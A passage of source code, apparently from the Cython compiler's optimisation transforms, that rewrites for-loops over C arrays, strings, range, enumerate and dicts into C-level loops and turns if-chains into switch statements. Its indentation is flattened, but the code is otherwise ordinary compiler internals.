counter_temp.ref(node.target.pos)],
is_temp = False,
)
if target_value.type != node.target.type:
target_value = target_value.coerce_to(node.target.type,
self.current_env())
target_assign = Nodes.SingleAssignmentNode(
pos = node.target.pos,
lhs = node.target,
rhs = target_value)
body = Nodes.StatListNode(
node.pos,
stats = [target_assign, node.body])
loop_node = Nodes.ForFromStatNode(
node.pos,
bound1=start_node, relation1=relation1,
target=counter_temp.ref(node.target.pos),
relation2=relation2, bound2=end_node,
step=None, body=body,
else_clause=node.else_clause,
from_range=True)
setup_node = Nodes.ExprStatNode(
node.pos,
expr = ExprNodes.PythonCapiCallNode(
slice_node.pos, "__Pyx_init_unicode_iteration",
self.init_unicode_iteration_func_type,
args = [unpack_temp_node,
ExprNodes.AmpersandNode(slice_node.pos, operand=length_temp.ref(slice_node.pos),
type=PyrexTypes.c_py_ssize_t_ptr_type),
ExprNodes.AmpersandNode(slice_node.pos, operand=data_temp.ref(slice_node.pos),
type=PyrexTypes.c_void_ptr_ptr_type),
ExprNodes.AmpersandNode(slice_node.pos, operand=kind_temp.ref(slice_node.pos),
type=PyrexTypes.c_int_ptr_type),
],
is_temp = True,
result_is_used = False,
utility_code=UtilityCode.load_cached("unicode_iter", "Optimize.c"),
))
return UtilNodes.LetNode(
unpack_temp_node,
UtilNodes.TempsBlockNode(
node.pos, temps=[counter_temp, length_temp, data_temp, kind_temp],
body=Nodes.StatListNode(node.pos, stats=[setup_node, loop_node])))
def _transform_carray_iteration(self, node, slice_node, reversed=False):
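# Iteration over a C array or pointer slice becomes a pointer-based
# for-from loop: a temp pointer runs from the start address to the stop
# address (with an optional constant step) and the loop target is filled
# by indexing/dereferencing it on each pass.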
neg_step = False
if isinstance(slice_node, ExprNodes.SliceIndexNode):
slice_base = slice_node.base
start = filter_none_node(slice_node.start)
stop = filter_none_node(slice_node.stop)
step = None
if not stop:
if not slice_base.type.is_pyobject:
error(slice_node.pos, "C array iteration requires known end index")
return node
elif isinstance(slice_node, ExprNodes.IndexNode):
assert isinstance(slice_node.index, ExprNodes.SliceNode)
slice_base = slice_node.base
index = slice_node.index
start = filter_none_node(index.start)
stop = filter_none_node(index.stop)
step = filter_none_node(index.step)
if step:
if not isinstance(step.constant_result, (int, long)) \
or step.constant_result == 0 \
or step.constant_result > 0 and not stop \
or step.constant_result < 0 and not start:
if not slice_base.type.is_pyobject:
error(step.pos, "C array iteration requires known step size and end index")
return node
else:
# step sign is handled internally by ForFromStatNode
step_value = step.constant_result
if reversed:
step_value = -step_value
neg_step = step_value < 0
step = ExprNodes.IntNode(step.pos, type=PyrexTypes.c_py_ssize_t_type,
value=str(abs(step_value)),
constant_result=abs(step_value))
elif slice_node.type.is_array:
if slice_node.type.size is None:
error(slice_node.pos, "C array iteration requires known end index")
return node
slice_base = slice_node
start = None
stop = ExprNodes.IntNode(
slice_node.pos, value=str(slice_node.type.size),
type=PyrexTypes.c_py_ssize_t_type, constant_result=slice_node.type.size)
step = None
else:
if not slice_node.type.is_pyobject:
error(slice_node.pos, "C array iteration requires known end index")
return node
if start:
start = start.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
if stop:
stop = stop.coerce_to(PyrexTypes.c_py_ssize_t_type, self.current_env())
if stop is None:
if neg_step:
stop = ExprNodes.IntNode(
slice_node.pos, value='-1', type=PyrexTypes.c_py_ssize_t_type, constant_result=-1)
else:
error(slice_node.pos, "C array iteration requires known step size and end index")
return node
if reversed:
if not start:
start = ExprNodes.IntNode(slice_node.pos, value="0", constant_result=0,
type=PyrexTypes.c_py_ssize_t_type)
# if step was provided, it was already negated above
start, stop = stop, start
ptr_type = slice_base.type
if ptr_type.is_array:
ptr_type = ptr_type.element_ptr_type()
carray_ptr = slice_base.coerce_to_simple(self.current_env())
if start and start.constant_result != 0:
start_ptr_node = ExprNodes.AddNode(
start.pos,
operand1=carray_ptr,
operator='+',
operand2=start,
type=ptr_type)
else:
start_ptr_node = carray_ptr
if stop and stop.constant_result != 0:
stop_ptr_node = ExprNodes.AddNode(
stop.pos,
operand1=ExprNodes.CloneNode(carray_ptr),
operator='+',
operand2=stop,
type=ptr_type
).coerce_to_simple(self.current_env())
else:
stop_ptr_node = ExprNodes.CloneNode(carray_ptr)
counter = UtilNodes.TempHandle(ptr_type)
counter_temp = counter.ref(node.target.pos)
if slice_base.type.is_string and node.target.type.is_pyobject:
# special case: char* -> bytes/unicode
if slice_node.type is Builtin.unicode_type:
target_value = ExprNodes.CastNode(
ExprNodes.DereferenceNode(
node.target.pos, operand=counter_temp,
type=ptr_type.base_type),
PyrexTypes.c_py_ucs4_type).coerce_to(
node.target.type, self.current_env())
else:
# char* -> bytes coercion requires slicing, not indexing
target_value = ExprNodes.SliceIndexNode(
node.target.pos,
start=ExprNodes.IntNode(node.target.pos, value='0',
constant_result=0,
type=PyrexTypes.c_int_type),
stop=ExprNodes.IntNode(node.target.pos, value='1',
constant_result=1,
type=PyrexTypes.c_int_type),
base=counter_temp,
type=Builtin.bytes_type,
is_temp=1)
elif node.target.type.is_ptr and not node.target.type.assignable_from(ptr_type.base_type):
# Allow iteration with pointer target to avoid copy.
target_value = counter_temp
else:
# TODO: can this safely be replaced with DereferenceNode() as above?
target_value = ExprNodes.IndexNode(
node.target.pos,
index=ExprNodes.IntNode(node.target.pos, value='0',
constant_result=0,
type=PyrexTypes.c_int_type),
base=counter_temp,
is_buffer_access=False,
type=ptr_type.base_type)
if target_value.type != node.target.type:
target_value = target_value.coerce_to(node.target.type,
self.current_env())
target_assign = Nodes.SingleAssignmentNode(
pos = node.target.pos,
lhs = node.target,
rhs = target_value)
body = Nodes.StatListNode(
node.pos,
stats = [target_assign, node.body])
relation1, relation2 = self._find_for_from_node_relations(neg_step, reversed)
for_node = Nodes.ForFromStatNode(
node.pos,
bound1=start_ptr_node, relation1=relation1,
target=counter_temp,
relation2=relation2, bound2=stop_ptr_node,
step=step, body=body,
else_clause=node.else_clause,
from_range=True)
return UtilNodes.TempsBlockNode(
node.pos, temps=[counter],
body=for_node)
def _transform_enumerate_iteration(self, node, enumerate_function):
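# "for i, x in enumerate(seq[, start])" is rewritten as a plain loop over
# seq with an explicit counter: the counter is assigned to the first
# target and incremented at the top of the loop body, so no enumerate
# object is created.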
args = enumerate_function.arg_tuple.args
if len(args) == 0:
error(enumerate_function.pos,
"enumerate() requires an iterable argument")
return node
elif len(args) > 2:
error(enumerate_function.pos,
"enumerate() takes at most 2 arguments")
return node
if not node.target.is_sequence_constructor:
# leave this untouched for now
return node
targets = node.target.args
if len(targets) != 2:
# leave this untouched for now
return node
enumerate_target, iterable_target = targets
counter_type = enumerate_target.type
if not counter_type.is_pyobject and not counter_type.is_int:
# nothing we can do here, I guess
return node
if len(args) == 2:
start = unwrap_coerced_node(args[1]).coerce_to(counter_type, self.current_env())
else:
start = ExprNodes.IntNode(enumerate_function.pos,
value='0',
type=counter_type,
constant_result=0)
temp = UtilNodes.LetRefNode(start)
inc_expression = ExprNodes.AddNode(
enumerate_function.pos,
operand1 = temp,
operand2 = ExprNodes.IntNode(node.pos, value='1',
type=counter_type,
constant_result=1),
operator = '+',
type = counter_type,
#inplace = True, # not worth using in-place operation for Py ints
is_temp = counter_type.is_pyobject
)
loop_body = [
Nodes.SingleAssignmentNode(
pos = enumerate_target.pos,
lhs = enumerate_target,
rhs = temp),
Nodes.SingleAssignmentNode(
pos = enumerate_target.pos,
lhs = temp,
rhs = inc_expression)
]
if isinstance(node.body, Nodes.StatListNode):
node.body.stats = loop_body + node.body.stats
else:
loop_body.append(node.body)
node.body = Nodes.StatListNode(
node.body.pos,
stats = loop_body)
node.target = iterable_target
node.item = node.item.coerce_to(iterable_target.type, self.current_env())
node.iterator.sequence = args[0]
# recurse into loop to check for further optimisations
return UtilNodes.LetNode(temp, self._optimise_for_loop(node, node.iterator.sequence))
def _find_for_from_node_relations(self, neg_step_value, reversed):
if reversed:
if neg_step_value:
return '<', '<='
else:
return '>', '>='
else:
if neg_step_value:
return '>=', '>'
else:
return '<=', '<'
def _transform_range_iteration(self, node, range_function, reversed=False):
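# "for i in range(start, stop, step)" with a compile-time constant step
# becomes a ForFromStatNode, i.e. a C-level "for i from start <= i < stop
# by step" loop; a non-literal stop bound is kept in a temp to make it
# immutable during the loop.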
args = range_function.arg_tuple.args
if len(args) < 3:
step_pos = range_function.pos
step_value = 1
step = ExprNodes.IntNode(step_pos, value='1',
constant_result=1)
else:
step = args[2]
step_pos = step.pos
if not isinstance(step.constant_result, (int, long)):
# cannot determine step direction
return node
step_value = step.constant_result
if step_value == 0:
# will lead to an error elsewhere
return node
if reversed and step_value not in (1, -1):
# FIXME: currently broken - requires calculation of the correct bounds
return node
if not isinstance(step, ExprNodes.IntNode):
step = ExprNodes.IntNode(step_pos, value=str(step_value),
constant_result=step_value)
if len(args) == 1:
bound1 = ExprNodes.IntNode(range_function.pos, value='0',
constant_result=0)
bound2 = args[0].coerce_to_integer(self.current_env())
else:
bound1 = args[0].coerce_to_integer(self.current_env())
bound2 = args[1].coerce_to_integer(self.current_env())
relation1, relation2 = self._find_for_from_node_relations(step_value < 0, reversed)
if reversed:
bound1, bound2 = bound2, bound1
if step_value < 0:
step_value = -step_value
else:
if step_value < 0:
step_value = -step_value
step.value = str(step_value)
step.constant_result = step_value
step = step.coerce_to_integer(self.current_env())
if not bound2.is_literal:
# stop bound must be immutable => keep it in a temp var
bound2_is_temp = True
bound2 = UtilNodes.LetRefNode(bound2)
else:
bound2_is_temp = False
for_node = Nodes.ForFromStatNode(
node.pos,
target=node.target,
bound1=bound1, relation1=relation1,
relation2=relation2, bound2=bound2,
step=step, body=node.body,
else_clause=node.else_clause,
from_range=True)
if bound2_is_temp:
for_node = UtilNodes.LetNode(bound2, for_node)
return for_node
def _transform_dict_iteration(self, node, dict_obj, method, keys, values):
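# The dict for-loop is replaced by a while loop whose body starts with a
# DictIterationNextNode (PyDict_Next under the hood); the original dict
# length is stashed in a temp to guard against modification during
# iteration.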
temps = []
temp = UtilNodes.TempHandle(PyrexTypes.py_object_type)
temps.append(temp)
dict_temp = temp.ref(dict_obj.pos)
temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
temps.append(temp)
pos_temp = temp.ref(node.pos)
key_target = value_target = tuple_target = None
if keys and values:
if node.target.is_sequence_constructor:
if len(node.target.args) == 2:
key_target, value_target = node.target.args
else:
# unusual case that may or may not lead to an error
return node
else:
tuple_target = node.target
elif keys:
key_target = node.target
else:
value_target = node.target
if isinstance(node.body, Nodes.StatListNode):
body = node.body
else:
body = Nodes.StatListNode(pos = node.body.pos,
stats = [node.body])
# keep original length to guard against dict modification
dict_len_temp = UtilNodes.TempHandle(PyrexTypes.c_py_ssize_t_type)
temps.append(dict_len_temp)
dict_len_temp_addr = ExprNodes.AmpersandNode(
node.pos, operand=dict_len_temp.ref(dict_obj.pos),
type=PyrexTypes.c_ptr_type(dict_len_temp.type))
temp = UtilNodes.TempHandle(PyrexTypes.c_int_type)
temps.append(temp)
is_dict_temp = temp.ref(node.pos)
is_dict_temp_addr = ExprNodes.AmpersandNode(
node.pos, operand=is_dict_temp,
type=PyrexTypes.c_ptr_type(temp.type))
iter_next_node = Nodes.DictIterationNextNode(
dict_temp, dict_len_temp.ref(dict_obj.pos), pos_temp,
key_target, value_target, tuple_target,
is_dict_temp)
iter_next_node = iter_next_node.analyse_expressions(self.current_env())
body.stats[0:0] = [iter_next_node]
if method:
method_node = ExprNodes.StringNode(
dict_obj.pos, is_identifier=True, value=method)
dict_obj = dict_obj.as_none_safe_node(
"'NoneType' object has no attribute '%s'",
error = "PyExc_AttributeError",
format_args = [method])
else:
method_node = ExprNodes.NullNode(dict_obj.pos)
dict_obj = dict_obj.as_none_safe_node("'NoneType' object is not iterable")
def flag_node(value):
value = value and 1 or 0
return ExprNodes.IntNode(node.pos, value=str(value), constant_result=value)
result_code = [
Nodes.SingleAssignmentNode(
node.pos,
lhs = pos_temp,
rhs = ExprNodes.IntNode(node.pos, value='0',
constant_result=0)),
Nodes.SingleAssignmentNode(
dict_obj.pos,
lhs = dict_temp,
rhs = ExprNodes.PythonCapiCallNode(
dict_obj.pos,
"__Pyx_dict_iterator",
self.PyDict_Iterator_func_type,
utility_code = UtilityCode.load_cached("dict_iter", "Optimize.c"),
args = [dict_obj, flag_node(dict_obj.type is Builtin.dict_type),
method_node, dict_len_temp_addr, is_dict_temp_addr,
],
is_temp=True,
)),
Nodes.WhileStatNode(
node.pos,
condition = None,
body = body,
else_clause = node.else_clause
)
]
return UtilNodes.TempsBlockNode(
node.pos, temps=temps,
body=Nodes.StatListNode(
node.pos,
stats = result_code
))
PyDict_Iterator_func_type = PyrexTypes.CFuncType(
PyrexTypes.py_object_type, [
PyrexTypes.CFuncTypeArg("dict", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("is_dict", PyrexTypes.c_int_type, None),
PyrexTypes.CFuncTypeArg("method_name", PyrexTypes.py_object_type, None),
PyrexTypes.CFuncTypeArg("p_orig_length", PyrexTypes.c_py_ssize_t_ptr_type, None),
PyrexTypes.CFuncTypeArg("p_is_dict", PyrexTypes.c_int_ptr_type, None),
])
class SwitchTransform(Visitor.VisitorTransform):
"""
This transformation tries to turn long if statements into C switch statements.
The requirement is that every clause is a 'var == value' comparison (or an
'or'-combination of such comparisons), where 'var' is common to all clauses
and both 'var' and the values are ints.
"""
NO_MATCH = (None, None, None)
def extract_conditions(self, cond, allow_not_in):
while True:
if isinstance(cond, (ExprNodes.CoerceToTempNode,
ExprNodes.CoerceToBooleanNode)):
cond = cond.arg
elif isinstance(cond, UtilNodes.EvalWithTempExprNode):
# this is what we get from the FlattenInListTransform
cond = cond.subexpression
elif isinstance(cond, ExprNodes.TypecastNode):
cond = cond.operand
else:
break
if isinstance(cond, ExprNodes.PrimaryCmpNode):
if cond.cascade is not None:
return self.NO_MATCH
elif cond.is_c_string_contains() and \
isinstance(cond.operand2, (ExprNodes.UnicodeNode, ExprNodes.BytesNode)):
not_in = cond.operator == 'not_in'
if not_in and not allow_not_in:
return self.NO_MATCH
if isinstance(cond.operand2, ExprNodes.UnicodeNode) and \
cond.operand2.contains_surrogates():
# dealing with surrogates leads to different
# behaviour on wide and narrow Unicode
# platforms => refuse to optimise this case
return self.NO_MATCH
return not_in, cond.operand1, self.extract_in_string_conditions(cond.operand2)
elif not cond.is_python_comparison():
if cond.operator == '==':
not_in = False
elif allow_not_in and cond.operator == '!=':
not_in = True
else:
return self.NO_MATCH
# this looks somewhat silly, but it does the right
# checks for NameNode and AttributeNode
if is_common_value(cond.operand1, cond.operand1):
if cond.operand2.is_literal:
return not_in, cond.operand1, [cond.operand2]
elif getattr(cond.operand2, 'entry', None) \
and cond.operand2.entry.is_const:
return not_in, cond.operand1, [cond.operand2]
if is_common_value(cond.operand2, cond.operand2):
if cond.operand1.is_literal:
return not_in, cond.operand2, [cond.operand1]
elif getattr(cond.operand1, 'entry', None) \
and cond.operand1.entry.is_const:
return not_in, cond.operand2, [cond.operand1]
elif isinstance(cond, ExprNodes.BoolBinopNode):
if cond.operator == 'or' or (allow_not_in and cond.operator == 'and'):
allow_not_in = (cond.operator == 'and')
not_in_1, t1, c1 = self.extract_conditions(cond.operand1, allow_not_in)
not_in_2, t2, c2 = self.extract_conditions(cond.operand2, allow_not_in)
if t1 is not None and not_in_1 == not_in_2 and is_common_value(t1, t2):
if (not not_in_1) or allow_not_in:
return not_in_1, t1, c1+c2
return self.NO_MATCH
def extract_in_string_conditions(self, string_literal):
if isinstance(string_literal, ExprNodes.UnicodeNode):
charvals = list(map(ord, set(string_literal.value)))
charvals.sort()
return [ ExprNodes.IntNode(string_literal.pos, value=str(charval),
constant_result=charval)
for charval in charvals ]
else:
# this is a bit tricky as Py3's bytes type returns
# integers on iteration, whereas Py2 returns 1-char byte
# strings
characters = string_literal.value
characters = list(set([ characters[i:i+1] for i in range(len(characters)) ]))
characters.sort()
return [ ExprNodes.CharNode(string_literal.pos, value=charval,
constant_result=charval)
for charval in characters ]
def extract_common_conditions(self, common_var, condition, allow_not_in):
not_in, var, conditions = self.extract_conditions(condition, allow_not_in)
if var is None:
return self.NO_MATCH
elif common_var is not None and not is_common_value(var, common_var):
return self.NO_MATCH
elif not (var.type.is_int or var.type.is_enum) or sum([not (cond.type.is_int or cond.type.is_enum) for cond in conditions]):
return self.NO_MATCH
return not_in, var, conditions
def has_duplicate_values(self, condition_values):
# duplicated values don't work in a switch statement
seen = set()
for value in condition_values:
if value.has_constant_result():
if value.constant_result in seen:
return True
seen.add(value.constant_result)
else:
# this isn't completely safe as we don't know the
# final C value, but this is about the best we can do
try:
if value.entry.cname in seen:
return True
except AttributeError:
return True # play safe
seen.add(value.entry.cname)
return False
def visit_IfStatNode(self, node):
common_var = None
cases = []
for if_clause in node.if_clauses:
_, common_var, conditions = self.extract_common_conditions(
common_var, if_clause.condition, False)
if common_var is None:
self.visitchildren(node)
return node
cases.append(Nodes.SwitchCaseNode(pos = if_clause.pos,
conditions = conditions,
body = if_clause.body))
condition_values = [
cond for case in cases for cond in case.conditions]
if len(condition_values) < 2:
self.visitchildren(node)
return node
if self.has_duplicate_values(condition_values):
self.visitchildren(node)
return node
common_var = unwrap_node(common_var)
switch_node = Nodes.SwitchStatNode(pos = node.pos,
test = common_var,
cases = cases,
else_clause = node.else_clause)
return switch_node
def visit_CondExprNode(self, node):
not_in, common_var, conditions = self.extract_common_conditions(
None, node.test, True)
if common_var is None \
or len(conditions) < 2 \
or self.has_duplicate_values(conditions):
self.visitchildren(node)
return node
return self.build_simple_switch_statement(
node, common_var, conditions, not_in,
node.true_val, node.false_val)
def visit_BoolBinopNode(self, node):
not_in, common_var, conditions = self.extract_common_conditions(
None, node, True)
if common_var is None \
or len(conditions) < 2 \
or self.has_duplicate_values(conditions):
self.visitchildren(node)
return node
return self.build_simple_switch_statement(
node, common_var, conditions, not_in,
ExprNodes.BoolNode(node.pos, value=True, constant_result=True),
ExprNodes.BoolNode(node.pos, value=False, constant_result=False))
def visit_PrimaryCmpNode(self, node):
not_in, common_var, conditions = self.extract_common_conditions(
None, node, True)
if common_var is None \
or len(conditions) < 2 \
or self.has_duplicate_values(conditions):
self.visitchildren(node)
return node
return self.build_simple_switch_statement(
node, common_var, conditions, not_in,
ExprNodes.BoolNode(node.pos, value=True, constant_result=True),
ExprNodes.BoolNode(node.pos, value=False, constant_result=False))
def build_simple_switch_statement(self, node, common_var, conditions,
not_in, true_val, false_val):
result_ref = UtilNodes.ResultRefNode(node)
true_body = Nodes.SingleAssignmentNode(
node.pos,
lhs = result_ref,
rhs = true_val,
first = True)
false_body = Nodes.SingleAssignmentNode(
node.pos,
lhs = result_ref,
rhs = false_val,
first = True)
if not_in:
true_body, false_body = false_body, true_body
cases = [Nodes.SwitchCaseNode(pos = node.pos,
conditions = conditions,
body = true_body)]
common_var = unwrap_node(common_var)
switch_node = Nodes.SwitchStatNode(pos = node.pos,
test = common_var,
cases = cases,
else_clause = false_body)
replacement = UtilNodes.TempResultFromStatNode(result_ref, switch_node)
return replacement
def visit_EvalWithTempExprNode(self, node):
# drop unused expression temp from FlattenInListTransform
orig_expr = node.subexpression
temp_ref = node.lazy_temp
self.visitchildren(node)
if node.subexpression is not orig_expr:
# node was restructured => check if temp is still used
if not Visitor.tree_contains(node.subexpression, temp_ref):
return node.subexpression
return node
visit_Node = Visitor.VisitorTransform.recurse_to_children
class FlattenInListTransform(Visitor.VisitorTransform, SkipDeclarations):
"""
This transformation flattens "x in [val1, ..., valn]" into a sequential list
of comparisons.
"""
def visit_PrimaryCmpNode(self, node):
self.visitchildren(node)
if node.cascade is not None:
return node
elif node.operator == 'in':
conjunction = 'or'
eq_or_neq = '=='
elif node.operator == 'not_in':
conjunction = 'and'
eq_or_neq = '!='
else:
return node
if not isinstance(node.operand2, (ExprNodes.TupleNode,
ExprNodes.ListNode,
ExprNodes.SetNode)):
return node
args = node.operand2.args
if len(args) == 0:
# note: lhs may have side effects
return node
lhs = UtilNodes.ResultRefNode(node.operand1)
conds = []
temps = []
for arg in args:
try:
# Trial optimisation to avoid redundant temp
# assignments. However, since is_simple() is meant to
# be called after type analysis, we ignore any errors
# and just play safe in that case.
is_simple_arg = arg.is_simple()
except Exception:
is_simple_arg = False
if not is_simple_arg:
# must evaluate all non-simple RHS before doing the comparisons
arg = UtilNodes.LetRefNode(arg)
temps.append(arg)
cond = ExprNodes.PrimaryCmpNode(
pos = node.pos,
operand1 = lhs,
operator = eq_or_neq,
operand2 = arg,
cascade = None)
conds.append(ExprNodes.TypecastNode(
pos = node.pos,
operand = cond,
type = PyrexTypes.c_bint_type))
def concat(left, right):
return ExprNodes.BoolBinopNode(
pos = node.pos,
operator = conjunction,
operand1 = left,
operand2 = right)
condition = reduce(concat, conds)
new_node = UtilNodes.EvalWithTempExprNode(lhs, condition)
for temp in temps[::-1]:
new_node = UtilNodes.EvalWithTempExprNode(temp, new_node)
return new_node
visit_Node = Visitor.VisitorTransform.recurse_to_children
class DropRefcountingTransform(Visitor.VisitorTransform):
"""Drop ref-counting in safe places.
"""
visit_Node = Visitor.VisitorTransform.recurse_to_children
def visit_ParallelAssignmentNode(self, node):
"""
Parallel swap assignments like 'a,b = b,a' are safe.
"""
left_names, right_names = [], []
left_indices, right_indices = [], []
temps = []
for stat in node.stats:
if isinstance(stat, Nodes.SingleAssignmentNode):
if not self._extract_operand(stat.lhs, left_names,
left_indices, temps):
return node
if not self._extract_operand(stat.rhs, right_names,
right_indices, temps):
return node
elif isinstance(stat, Nodes.CascadedAssignmentNode):
# FIXME
return node
else:
return node
if left_names or right_names:
# lhs/rhs names must be a non-redundant permutation
lnames = [ path for path, n in left_names ]
rnames = [ path for path, n in right_names ]
if set(lnames) != set(rnames):
return node
if len(set(lnames)) != len(right_names):
return node
if left_indices or right_indices:
# base name and index of index nodes must be a
# non-redundant permutation
lindices = []
for lhs_node in left_indices:
index_id = self._extract_index_id(lhs_node)
if not index_id:
return node
lindices.append(index_id)
rindices = []
for rhs_node in right_indices:
index_id = self._extract_index_id(rhs_node)
if not index_id:
return node
rindices.append(index_id)
if set(lindices) != set(rindices):
return node
if len(set(lindices)) != len(right_indices):
return node
# really supporting IndexNode requires support in
# __Pyx_GetItemInt(), so let's stop short for now
return node
temp_args = [t.arg for t in temps]
for temp in temps:
temp.use_managed_ref = False
for _, name_node in left_names + right_names:
if name_node not in temp_args:
name_node.use_managed_ref = False
for index_node in left_indices + right_indices:
index_node.use_managed_ref = False
return node
def _extract_operand(self, node, names, indices, temps):
node = unwrap_node(node)
if not node.type.is_pyobject:
return False
if isinstance(node, ExprNodes.CoerceToTempNode):
temps.append(node)
node = node.arg
name_path = []
obj_node = node
while isinstance(obj_node, ExprNodes.AttributeNode):
if obj_node.is_py_attr:
return False
name_path.append(obj_node.member)
obj_node = obj_node.obj
if isinstance(obj_node, ExprNodes.NameNode):
name_path.append(obj_node.name)
names.append( ('.'.join(name_path[::-1]), node) )
elif isinstance(node, ExprNodes.IndexNode):
if node.base.type != Builtin.list_type:
return False
if not node.index.type.is_int:
return False
if not isinstance(node.base, ExprNodes.NameNode):
return False
indices.append(node)
else:
return False
return True
def _extract_index_id(self, index_node):
base = index_node.base
index = index_node.index
if isinstance(index, ExprNodes.NameNode):
index_val = index.name
elif isinstance(index, ExprNodes.ConstNode):
# FIXME:
return None
else:
return None
return (base.name, index_val)
class EarlyReplaceBuiltinCalls(Visitor.EnvTransform):
"""Optimize some common calls to builtin types *before* the type
analysis phase and *after* the declarations analysis phase.
This transform cannot make use of any argument types, but it can
restructure the tree in a way that the type analysis phase can
respond to.
Introducing C function calls here may not be a good idea. Move
them to the OptimizeBuiltinCalls transform instead, which runs
after type analysis.
"""
# only intercept on call nodes
visit_Node = Visitor.VisitorTransform.recurse_to_children
def visit_SimpleCallNode(self, node):
self.visitchildren(node)
function = node.function
if not self._function_is_builtin_name(function):
return node
return self._dispatch_to_handler(node, function, node.args)
def visit_GeneralCallNode(self, node):
self.visitchildren(node)
function = node.function
if not self._function_is_builtin_name(function):
return node
arg_tuple = node.positional_args
if not isinstance(arg_tuple, ExprNodes.TupleNode):
return node
args = arg_tuple.args
return self._dispatch_to_handler(
node, function, args, node.keyword_args)
def _function_is_builtin_name(self, function):
if not function.is_name:
return False
env = self.current_env()
entry = env.lookup(function.name)
if entry is not env.builtin_scope().lookup_here(function.name):
return False
# if entry is None, it's at least an undeclared name, so likely builtin
return True
def _dispatch_to_handler(self, node, function, args, kwargs=None):
if kwargs is None:
handler_name = '_handle_simple_function_%s' % function.name
else:
handler_name = '_handle_general_function_%s' % function.name
handle_call = getattr(self, handler_name, None)
if handle_call is not None:
if kwargs is None:
return handle_call(node, args)
else:
return handle_call(node, args, kwargs)
return node
def _inject_capi_function(self, node, cname, func_type, utility_code=None):
node.function = ExprNodes.PythonCapiFunctionNode(
node.function.pos, node.function.name, cname, func_type,
utility_code = utility_code)
def _error_wrong_arg_count(self, function_name, node, args, expected=None):
if not expected: # None or 0
arg_str = ''
elif isinstance(expected, basestring) or expected > 1:
arg_str = '...'
elif expected == 1:
arg_str = 'x'
else:
arg_str = ''
if expected is not None:
expected_str = 'expected %s, ' % expected
else:
expected_str = ''
error(node.pos, "%s(%s) called with wrong number of args, %sfound %d" % (
function_name, arg_str, expected_str, len(args)))
# specific handlers for simple call nodes
def _handle_simple_function_float(self, node, pos_args):
if not pos_args:
return ExprNodes.FloatNode(node.pos, value='0.0')
if len(pos_args) > 1:
self._error_wrong_arg_count('float', node, pos_args, 1)
arg_type = getattr(pos_args[0], 'type', None)
if arg_type in (PyrexTypes.c_double_type, Builtin.float_type):
return pos_args[0]
return node
class YieldNodeCollector(Visitor.TreeVisitor):
def __init__(self):
Visitor.TreeVisitor.__init__(self)
self.yield_stat_nodes = {}
self.yield_nodes = []
visit_Node = Visitor.TreeVisitor.visitchildren
        # XXX: the handlers below are renamed with a leading '__' to disable
        # generator inlining until it is properly supported again
def __visit_YieldExprNode(self, node):
self.yield_nodes.append(node)
self.visitchildren(node)
def __visit_ExprStatNode(self, node):
self.visitchildren(node)
if node.expr in self.yield_nodes:
self.yield_stat_nodes[node.expr] = node
def __visit_GeneratorExpressionNode(self, node):
# enable when we support generic generator expressions
#
# everything below this node is out of scope
pass
def _find_single_yield_expression(self, node):
collector = self.YieldNodeCollector()
collector.visitchildren(node)
if len(collector.yield_nodes) != 1:
return None, None
yield_node = collector.yield_nodes[0]
try:
return (yield_node.arg, collector.yield_stat_nodes[yield_node])
except KeyError:
return None, None
def _handle_simple_function_all(self, node, pos_args):
"""Transform
_result = all(x for L in LL for x in L)
into
for L in LL:
for x in L:
if not x:
_result = False
break
else:
continue
break
else:
_result = True
"""
return self._transform_any_all(node, pos_args, False)
def _handle_simple_function_any(self, node, pos_args):
"""Transform
_result = any(x for L in LL for x in L)
into
for L in LL:
for x in L:
if x:
_result = True
break
else:
continue
break
else:
_result = False
"""
return self._transform_any_all(node, pos_args, True)
def _transform_any_all(self, node, pos_args, is_any):
if len(pos_args) != 1:
return node
if not isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
return node
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
if is_any:
condition = yield_expression
else:
condition = ExprNodes.NotNode(yield_expression.pos, operand = yield_expression)
result_ref = UtilNodes.ResultRefNode(pos=node.pos, type=PyrexTypes.c_bint_type)
test_node = Nodes.IfStatNode(
yield_expression.pos,
else_clause = None,
if_clauses = [ Nodes.IfClauseNode(
yield_expression.pos,
condition = condition,
body = Nodes.StatListNode(
node.pos,
stats = [
Nodes.SingleAssignmentNode(
node.pos,
lhs = result_ref,
rhs = ExprNodes.BoolNode(yield_expression.pos, value = is_any,
constant_result = is_any)),
Nodes.BreakStatNode(node.pos)
])) ]
)
loop = loop_node
while isinstance(loop.body, Nodes.LoopNode):
next_loop = loop.body
loop.body = Nodes.StatListNode(loop.body.pos, stats = [
loop.body,
Nodes.BreakStatNode(yield_expression.pos)
])
next_loop.else_clause = Nodes.ContinueStatNode(yield_expression.pos)
loop = next_loop
loop_node.else_clause = Nodes.SingleAssignmentNode(
node.pos,
lhs = result_ref,
rhs = ExprNodes.BoolNode(yield_expression.pos, value = not is_any,
constant_result = not is_any))
Visitor.recursively_replace_node(loop_node, yield_stat_node, test_node)
return ExprNodes.InlinedGeneratorExpressionNode(
gen_expr_node.pos, loop = loop_node, result_node = result_ref,
expr_scope = gen_expr_node.expr_scope, orig_func = is_any and 'any' or 'all')
def _handle_simple_function_sorted(self, node, pos_args):
"""Transform sorted(genexpr) and sorted([listcomp]) into
[listcomp].sort(). CPython just reads the iterable into a
list and calls .sort() on it. Expanding the iterable in a
listcomp is still faster and the result can be sorted in
place.
"""
if len(pos_args) != 1:
return node
if isinstance(pos_args[0], ExprNodes.ComprehensionNode) \
and pos_args[0].type is Builtin.list_type:
listcomp_node = pos_args[0]
loop_node = listcomp_node.loop
elif isinstance(pos_args[0], ExprNodes.GeneratorExpressionNode):
gen_expr_node = pos_args[0]
loop_node = gen_expr_node.loop
yield_expression, yield_stat_node = self._find_single_yield_expression(loop_node)
if yield_expression is None:
return node
append_node = ExprNodes.ComprehensionAppendNode(
yield_expression.pos, expr = yield_expression)
Visitor.recursively_replace_node(loop_node, yield_stat_node, append_node)
listcomp_node = ExprNodes.ComprehensionNode(
gen_expr_node.pos, loop = loop_node,
append = append_node, type = Builtin.list_type,
expr_scope = gen_expr_node.expr_scope,
has_local_scope = True)
append_node.target = listcomp_node
else:
return node
result_node = UtilNodes.ResultRefNode(
pos = loop_node.pos, type = Builtin.list_type, may_hold_none=False)
